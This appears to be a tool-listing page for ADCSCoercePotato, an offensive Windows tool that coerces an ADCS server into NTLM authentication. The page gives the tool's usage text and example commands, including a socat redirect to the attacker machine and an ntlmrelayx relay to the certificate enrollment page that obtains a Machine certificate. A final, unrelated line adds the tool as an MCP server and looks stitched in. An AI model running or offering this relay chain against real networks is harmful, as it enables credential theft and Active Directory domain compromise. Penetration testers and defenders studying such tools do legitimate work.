Browse by type
Yet another technique for coercing machine authentication but specific for ADCS server
Full details: https://decoder.cloud/2024/02/26/hello-im-your-adcs-server-and-i-want-to-authenticate-against-you/ ``` ADCSCoercePotato - @decoder_it 2024
Mandatory args: -u Domain Username -p password -d Domain Name -m remote DCOM (ADCS) server address -k redirector where socat and ntlmrelayx is running
Optional args: -n HTTP port where redirector (ntlmrelayx) is listening, default:80 -l local socket server port, default:9999 -c default:{D99E6E74-FC88-11D0-B498-00A0C90312F3}
Example: ADCSCoercePotato.exe -m 192.168.212.22 -k 192.168.1.88 -u myuser -p mypass -d mydomain.domain On the Linux box (assuming it has IP:192.168.1.88 and the Windows attacker machine is:192.168.1.89) and ADCS web enrollment service is also running on:192.168.212.41 -> socat tcp -listen:135, reuseaddr, fork tcp:192.168.1.89:9999 & -> ntlmrelayx.py -t http://192.168.212.41/certsrv/certrqus.asp --adcs --template Machine -smb2support
$ claude mcp add ADCSCoercePotato \
-- python -m otcore.mcp_server <graph>